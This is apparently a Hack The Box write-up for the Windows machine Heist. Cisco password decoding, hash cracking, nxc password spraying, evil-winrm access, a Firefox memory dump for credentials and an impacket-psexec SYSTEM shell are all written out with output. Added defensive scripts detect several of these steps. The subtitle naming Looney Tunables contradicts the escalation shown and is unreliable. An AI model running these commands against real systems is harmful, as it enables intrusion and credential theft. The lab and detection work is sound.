HTB — Heist
Cisco IOS config file exposed via web portal with hashed passwords. Cracked hashes reused for RPC access, Looney Tunables for escalation.
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.026s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-18T06:13:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 28.24 ms 10.10.14.1
2 28.35 ms 10.10.10.149
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.34 seconds

80/tcp open http
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
-
pasting "isdn switch-type basic-5ess" into Google shows the attachment is a Cisco IOS config
-
pasting the password 7 strings into Google turns up a decoder that reverses them (type 7 is a reversible encoding, not a hash)

rout3r:$uperP@ssword

admin:Q4)sJu\Y8qz*A3?d
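Why the router config is the whole foothold: type 7 strings are an encoding under a fixed, public key, and type 5 is a fast MD5-crypt that rockyou cracks in seconds. The audit script below is an added example, not code from the writeup and not Cisco's; it classifies every credential line of an IOS config by type number and reverses any type 7 string in place. The config text and the $1$/$9$ values in it are constructed placeholders rather than the box's config; the one real test vector is the well-known type 7 encoding 01100F175804 of the string cisco.

```python
"""Audit a Cisco IOS configuration for weak credential storage.

Added example for this writeup, not code from the box or from Cisco. It
classifies every password/secret line by its IOS type number and reverses
type 7 strings to show they are an encoding, not a hash. The config text and
hash-like values below are constructed for the demo; "01100F175804" is the
well-known type 7 encoding of the string "cisco".
"""
import re

# Cisco's fixed type 7 XOR key. It is public and identical on every device,
# which is why type 7 offers no protection once the config leaks.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

TYPE_INFO = {
    "0": "plaintext",
    "7": "reversible XOR encoding, recoverable instantly",
    "5": "salted but fast MD5-crypt ($1$): cheap to crack with a wordlist",
    "8": "PBKDF2-SHA256: acceptable",
    "9": "scrypt: preferred",
}
WEAK_TYPES = {"0", "7", "5"}

# Matches enable/username/line passwords, with an optional "privilege N" and an
# optional type digit (a missing type means the value is plaintext).
LINE_RE = re.compile(
    r"^\s*(?P<what>enable (?:secret|password)"
    r"|username \S+(?: privilege \d+)? (?:secret|password)"
    r"|password)\s+(?:(?P<type>[05789])\s+)?(?P<value>\S+)\s*$"
)


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits give the key offset, the
    rest is hex, one byte per character XORed with the rotating key."""
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", encoded):
        raise ValueError("not a type 7 string")
    offset = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return plain.decode("ascii")


def encode_type7(plain: str, offset: int = 1) -> str:
    """Forward direction, used here only to build round-trip test vectors."""
    body = bytes(ord(c) ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, c in enumerate(plain))
    return f"{offset:02d}{body.hex().upper()}"


def audit_config(config: str) -> list[dict]:
    """Return one finding per credential line: its type, a verdict, and for
    type 7 the recovered cleartext."""
    findings = []
    for raw in config.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ptype = m["type"] or "0"
        finding = {
            "line": raw.strip(),
            "type": ptype,
            "verdict": TYPE_INFO.get(ptype, "unknown type"),
            "weak": ptype in WEAK_TYPES,
        }
        if ptype == "7":
            try:
                finding["recovered"] = decode_type7(m["value"])
            except ValueError:
                finding["recovered"] = None  # malformed type 7 string
        findings.append(finding)
    return findings


# Constructed sample config (not the router config from the box). The $1$ and
# $9$ values are placeholders shaped like real hashes, not real hashes.
SAMPLE_CONFIG = """\
hostname router-sample
enable secret 5 $1$EXAM$placeholderplaceholdera
username rout3r password 7 01100F175804
username admin privilege 15 secret 9 $9$placeholderscryptvalue
line vty 0 4
 password 0 plainpass
"""


def main() -> None:
    for f in audit_config(SAMPLE_CONFIG):
        flag = "WEAK" if f["weak"] else "ok  "
        extra = f"  -> recovered: {f['recovered']}" if f.get("recovered") else ""
        print(f"{flag} type {f['type']}: {f['line']}{extra}")
        print(f"       {f['verdict']}")


if __name__ == "__main__":
    main()
```

The practical fix on the device side is to replace every `password 7` and `secret 5` line with type 9 (`enable algorithm-type scrypt secret ...`), and to treat a leaked config as a credential leak regardless of type, since type 9 only slows cracking down.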
cisco secret 5 hash (MD5-crypt, $1$ prefix)
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
cracked: stealth1agent; try it against SMB
nxc smb 10.10.10.149 -u hazard -p 'stealth1agent'
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\hazard:stealth1agent
smbclient -L \\\\10.10.10.149 -U 'hazard'
Password for [WORKGROUP\hazard]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC

135/tcp open msrpc
135/tcp open msrpc Microsoft Windows RPC
rpcclient -U "hazard" 10.10.10.149
Password for [WORKGROUP\hazard]:
rpcclient $> ls
command not found: ls
rpcclient $> srvinfo
10.10.10.149 Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003
lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
nxc winrm 10.10.10.149 -u users.txt -p passwords.txt --continue-on-success
WINRM 10.10.10.149 5985 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\:Q4)sJu\Y8qz*A3?d
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\:$uperP@ssword
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Hazard:stealth1agent
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\support:stealth1agent
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent
WINRM 10.10.10.149 5985 SUPPORTDESK [-] SupportDesk\:stealth1agent
nxc smb 10.10.10.149 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] Connection Error: Error occurs while reading from remote(104)
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [-] SupportDesk\:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
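From the defender's side the two nxc runs above leave a recognisable trace on SUPPORTDESK: one logon failure (event 4625) per account from the same source address within seconds, then a success (4624) for the one account whose password matched. The script below is an added example, not part of the writeup; it assumes a key=value export of those events (constructed sample inline, field names taken from the real 4625/4624 schema) and flags any source that fails against three or more distinct accounts inside a five-minute window.

```python
"""Flag password spraying in Windows logon events.

Added example for this writeup, not code from the box. A spray produces one
4625 (logon failure) per user from a single source, often followed by a 4624
(success) for the one account whose password matched. The script groups
failures by source IP over a sliding window and alerts when one source fails
against several distinct accounts. Input lines are a constructed key=value
export; the field names follow the real 4625/4624 event schema.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\s+EventID=(?P<id>\d+)"
    r"\s+TargetUserName=(?P<user>\S*)\s+IpAddress=(?P<ip>\S+)"
    r"(?:\s+Status=(?P<status>\S+))?"
)

# Constructed sample: three users failed and one succeeded from 10.10.14.5
# (plus a blank username from an empty line in the wordlist), and an
# unrelated user mistyping their own password twice from 10.10.20.7.
SAMPLE_LOG = """\
2025-01-18T06:20:01Z EventID=4625 TargetUserName=Hazard IpAddress=10.10.14.5 Status=0xC000006D
2025-01-18T06:20:01Z EventID=4625 TargetUserName=support IpAddress=10.10.14.5 Status=0xC000006D
2025-01-18T06:20:02Z EventID=4625 TargetUserName=Jason IpAddress=10.10.14.5 Status=0xC000006D
2025-01-18T06:20:02Z EventID=4625 TargetUserName= IpAddress=10.10.14.5 Status=0xC000006D
2025-01-18T06:20:03Z EventID=4624 TargetUserName=Chase IpAddress=10.10.14.5
2025-01-18T06:31:10Z EventID=4625 TargetUserName=Jason IpAddress=10.10.20.7 Status=0xC000006D
2025-01-18T06:31:25Z EventID=4625 TargetUserName=Jason IpAddress=10.10.20.7 Status=0xC000006D
"""


def parse_events(text: str) -> list[dict]:
    """Parse the export into dicts sorted by timestamp; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "id": int(m["id"]),
            "user": m["user"].lower(),
            "ip": m["ip"],
            "status": m["status"],
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_spray(events: list[dict], window: timedelta = timedelta(minutes=5),
                 min_users: int = 3) -> list[dict]:
    """One alert per source IP that failed logons for >= min_users distinct
    accounts inside `window`; lists any successes from that IP in the window."""
    by_ip: dict[str, list[dict]] = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["id"] == 4625 and e["user"]]  # skip blank users
        start = 0
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in failures[start:end + 1]}
            if len(users) >= min_users:
                lo, hi = failures[start]["ts"], failures[end]["ts"] + window
                successes = {e["user"] for e in evs if e["id"] == 4624 and lo <= e["ts"] <= hi}
                alerts.append({"ip": ip, "users": sorted(users), "success": sorted(successes)})
                break  # one alert per source is enough for triage
    return alerts


def main() -> None:
    for a in detect_spray(parse_events(SAMPLE_LOG)):
        print(f"spray from {a['ip']}: {len(a['users'])} accounts {a['users']}; "
              f"succeeded for {a['success'] or 'none'}")


if __name__ == "__main__":
    main()
```

The threshold and window are tuning knobs; on a workgroup host like this one the same failures show up as 4625 with logon type 3, while in a domain the DC additionally logs 4776 (NTLM) or 4771 (Kerberos pre-auth failure) per attempt, which is the better place to run the same grouping.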
creds
Chase:Q4)sJu\Y8qz*A3?d
evil-winrm
evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat user.txt
2100695f...
priv esc
*Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
*Evil-WinRM* PS C:\Users\Chase> upload /opt/windows/winPEASx64.exe
╔══════════╣ Installed Applications --Via Program Files/Uninstall registry--
╚ Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Mozilla Firefox
C:\Program Files\PHP
C:\Program Files\Reference Assemblies
*Evil-WinRM* PS C:\users\chase> Get-Process firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
401 34 40160 101364 1.25 364 1 firefox
347 19 10264 38736 0.08 5608 1 firefox
1075 73 177368 252848 7.44 6088 1 firefox
378 28 24492 61652 0.64 6304 1 firefox
356 25 16416 38920 0.16 6572 1 firefox
- upload procdump to dump the firefox process
*Evil-WinRM* PS C:\Users\Chase> upload /opt/windows/procdump.exe
*Evil-WinRM* PS C:\users\chase> download firefox.dmp
firefox process dump (firefox.dmp)
strings firefox.dmp | grep "password"
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localization/en-US/toolkit/passwordmgr/passwordManagerList.ftlPK
modules/services-sync/engines/passwords.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.xulPK
chrome/toolkit/content/passwordmgr/recipes.jsonPK
chrome/toolkit/skin/classic/global/passwordmgr.cssPK
chrome/pippki/content/pippki/changepassword.jsPK
chrome/pippki/content/pippki/changepassword.xhtmlPK
chrome/pippki/content/pippki/resetpassword.jsPK
chrome/pippki/content/pippki/resetpassword.xhtmlPK
chrome/pippki/content/pippki/setp12password.jsPK
chrome/pippki/content/pippki/setp12password.xhtmlPK
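The lesson from the dump is not specific to Firefox: login.php accepts the password as a GET parameter, so the same string also lands in browser history, the IIS log, any proxy in between and the crash-reporter restart arguments seen above. The following added example (not from the writeup) scans IIS W3C log lines for sensitive query parameters and prints a redacted copy of each hit; the log lines and the password value in them are constructed, and the parameter-name list is an assumption you would extend for your own applications.

```python
"""Find credentials carried in URL query strings.

Added example for this writeup, not code from the box. A login form that
submits credentials with GET leaves the password in every place the URL is
stored: browser history, web server and proxy logs, Referer headers, process
memory. This script scans IIS W3C log lines (a constructed sample below) for
sensitive query parameters and emits a redacted copy of each hit so it can be
reported without re-spreading the secret.
"""
from urllib.parse import parse_qsl, urlencode

# Assumed parameter names; extend for the applications you actually run.
SENSITIVE_PARAMS = {
    "password", "passwd", "pwd", "pass", "login_password",
    "secret", "token", "access_token", "api_key", "apikey",
}

# Constructed IIS W3C lines in the default field order (see the #Fields line).
# The password value is made up for the demo.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-01-18 06:10:01 10.10.10.149 GET /login.php - 80 - 10.10.14.5 Mozilla/5.0 - 200 0 0 12
2025-01-18 06:10:09 10.10.10.149 GET /login.php login_username=admin@support.htb&login_password=Sample-Pa55!&login= 80 - 127.0.0.1 Mozilla/5.0 - 302 0 0 20
2025-01-18 06:10:15 10.10.10.149 GET /issues.php page=2 80 - 10.10.14.5 Mozilla/5.0 - 200 0 0 8
"""


def credentials_in_query(query: str) -> list[str]:
    """Names of sensitive parameters that carry a non-empty value."""
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if k.lower() in SENSITIVE_PARAMS and v]


def redact_query(query: str) -> str:
    """Same query string with sensitive values replaced, safe to paste in a ticket."""
    pairs = [(k, "REDACTED" if k.lower() in SENSITIVE_PARAMS else v)
             for k, v in parse_qsl(query, keep_blank_values=True)]
    return urlencode(pairs)


def scan_iis_log(text: str) -> list[dict]:
    """One finding per request whose query string carries a credential."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue  # directives and blank lines
        fields = line.split()
        if len(fields) < 9 or fields[5] == "-":
            continue  # no query string on this request
        stem, query, client = fields[4], fields[5], fields[8]
        hits = credentials_in_query(query)
        if hits:
            findings.append({
                "time": f"{fields[0]} {fields[1]}",
                "client": client,
                "path": stem,
                "params": hits,
                "redacted": f"{stem}?{redact_query(query)}",
            })
    return findings


def main() -> None:
    for f in scan_iis_log(SAMPLE_IIS_LOG):
        print(f"{f['time']} {f['client']} {f['params']} -> {f['redacted']}")


if __name__ == "__main__":
    main()
```

The application-side fix is to accept credentials only in a POST body (and reject them when they arrive as query parameters), which keeps them out of every log and history store that records URLs; the scanner is for finding the places where that has already gone wrong.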
creds
4dD!5}x/re8]FBuZ
testing against Administrator
nxc smb 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'
SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.10.10.149 445 SUPPORTDESK [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
impacket-psexec administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file OqhiMDuK.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service OZhH on 10.10.10.149.....
[*] Starting service OZhH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
root.txt
C:\Users\Administrator\Desktop> type root.txt
88cd3661...
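The psexec run leaves a loud artefact: a letters-only executable written into ADMIN$ (the Windows directory) and registered as a four-letter service running as LocalSystem, which the System log records as event 7045 (a new service was installed). The added example below, not part of the writeup, applies two heuristics to a constructed key=value export of 7045 events (field names follow the real event): a letters-only binary sitting directly in the Windows directory, and a short service name with several case switches.

```python
"""Spot psexec-style service installs in System log 7045 events.

Added example for this writeup, not code from the box. Remote-execution tools
that work through the service control manager drop a binary into ADMIN$ and
register it as a service with a generated name, which Windows logs as event
7045. The records below are a constructed key=value export; the field names
match the real 7045 event. Both checks are heuristics, not signatures.
"""
import re

# Letters-only executable directly in the Windows directory (no subfolder).
RANDOM_EXE_RE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{6,12}\.exe$", re.IGNORECASE)

EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=7045\s+ServiceName=(?P<name>\S+)\s+ImagePath=(?P<path>.+?)"
    r"\s+AccountName=(?P<account>.+?)\s*$"
)

# Constructed sample: one tool-style install, one Sysmon install, one vendor agent.
SAMPLE_LOG = r"""2025-01-18T06:40:12Z EventID=7045 ServiceName=OZhH ImagePath=%SystemRoot%\OqhiMDuK.exe AccountName=LocalSystem
2025-01-18T03:02:55Z EventID=7045 ServiceName=Sysmon ImagePath=C:\Windows\Sysmon64.exe AccountName=LocalSystem
2025-01-18T04:15:00Z EventID=7045 ServiceName=BackupAgent ImagePath="C:\Program Files\Vendor\agent.exe" AccountName=NT AUTHORITY\NetworkService
"""


def case_switches(name: str) -> int:
    """Count lower->upper or upper->lower changes between adjacent characters.
    Words and TitleCase names score 0 or 1; generated names score higher."""
    return sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())


def assess(event: dict) -> list[str]:
    """Return the reasons an install looks like a remote-exec tool drop."""
    reasons = []
    name, path = event["name"], event["path"].strip('"')
    if RANDOM_EXE_RE.match(path):
        reasons.append("letters-only executable dropped directly in the Windows directory")
    if len(name) <= 8 and case_switches(name) >= 2:
        reasons.append("short mixed-case service name looks generated")
    if reasons and event["account"].lower() == "localsystem":
        reasons.append("runs as LocalSystem")  # context, not a reason on its own
    return reasons


def parse_7045(text: str) -> list[dict]:
    """Parse the export; lines that are not 7045 records are ignored."""
    return [m.groupdict() for m in (EVENT_RE.match(l) for l in text.splitlines()) if m]


def find_suspicious_installs(text: str) -> list[dict]:
    """7045 events with at least one heuristic hit, annotated with the reasons."""
    out = []
    for e in parse_7045(text):
        reasons = assess(e)
        if reasons:
            out.append({**e, "reasons": reasons})
    return out


def main() -> None:
    for hit in find_suspicious_installs(SAMPLE_LOG):
        print(f"{hit['ts']} service {hit['name']} -> {hit['path']}")
        for r in hit["reasons"]:
            print(f"    - {r}")


if __name__ == "__main__":
    main()
```

Corroborating records for the same action are a 5145 share-access event for ADMIN$ and a 4624 network logon by the Administrator account from the same source a few seconds before the 7045; pairing the three turns a heuristic into a confident detection.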